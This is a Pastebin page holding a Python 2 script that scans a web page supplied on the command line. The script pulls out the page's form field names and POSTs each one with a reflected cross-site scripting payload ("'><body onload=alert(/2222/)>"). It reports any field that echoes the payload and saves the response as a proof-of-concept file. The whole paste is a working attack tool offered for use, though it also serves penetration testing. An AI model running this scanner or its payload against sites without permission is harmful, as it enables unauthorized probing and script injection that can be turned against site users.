Ledger Nano X - The secure hardware wallet
SHARE
TWEET

webscan module - xss-over-post

a guest Mar 20th, 2013 127 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. # try_POST_xss.py
  4. #
  5. # first we will GET argv[1]/page.argv[2] to read it
  6. # and find out what names/inputs/submits/etc... there are.
  7. # next we will POST those param-names separetly with 'payload'.
  8.  
  9. # More @ http://hauntit.blogspot.com
  10. # enjoy.
  11.  
  12. import urllib
  13. import urllib2
  14. import re
  15. import sys
  16. import httplib
  17.  
  18. host = sys.argv[1]
  19. path_file = sys.argv[2]
  20. url = host+':80'
  21.  
  22. url_file = url+path_file
  23.  
  24. payload = '\'><body onload=alert(/2222/)>;]#/**'
  25. # if you want I have version 'payloads-from-file' too.
  26.  
  27. print 'Target: ',host
  28. print 'Vuln file: ',path_file
  29. print 'Full URL to attack:' ,url_file
  30. print
  31.  
  32. # first we must GET page, to read whole text to find
  33. # if there is any of our 'vulnerable' ('to find') string.
  34. get_connect = urllib.urlopen('http://'+url_file)
  35. get_response = get_connect.read()
  36. status = get_connect.getcode()
  37.  
  38. print 'Status of requested page: ',status
  39.  
  40.  
  41. # what we're looking for:
  42. #results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
  43. results = re.findall(" name=\"([^\"]+)\"",get_response)
  44.  
  45. #############################################################
  46. # hm ;] one idea to test right now. ;D
  47. poc = open('poc_file_for_POST_xss.html','w')
  48.  
  49. #############################################################
  50.  
  51. # func to send POST to target url+found parameter
  52. def do_post_now(url):
  53.   params = urllib.urlencode ( { results[i] : payload } )
  54.   headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
  55.   connect = httplib.HTTPConnection(url)
  56.   connect.request('POST', path_file, params, headers)
  57.   response = connect.getresponse()
  58.   print response.status, response.reason # 200 OK?
  59.   data = response.read()
  60.   connect.close() # end of test this parameter at this URL
  61.   y=0
  62.   line = data.find('2222')
  63.   if line != -1:
  64.     print '\t[+- (  POST XSS alert!  ) -+]'
  65.     print '\t [+] Found POST XSS in line:' ,line
  66.     print data[y]
  67.     print poc.writelines(data)
  68.    # poc.close() # write&save simple p0c file. ;7
  69.    # lookout here, because in some cases .close() method will generate an error.
  70.    # that's why it's #commented here.
  71.     y=y+1
  72.    
  73. # end of do_post_now(url)
  74. # ---
  75.  
  76. # MAIN:
  77. if len(sys.argv) < 2:
  78.   sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
  79.   sys.exit(1)
  80. else:
  81.  
  82.   # if result found:
  83.   if (len(results)>0):
  84.     print '-------------------------------------------------------------'
  85.     print 'Got some results :) Now we can try to exploit parameters.\n'
  86.  
  87.     i = 0 # next in list
  88.     while i < len(results):
  89.       print 'Found param called: ',results[i]  
  90.    
  91.       print 'Do POST now, for URL: ', url, ' with param: ', results[i]
  92.       # here we'll create a POST for found parameter
  93.       do_post_now(url)
  94.       # end of this POST for this parameter
  95.  
  96.     # and next line:
  97.       i=i+1
  98.     # end of while i loop
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top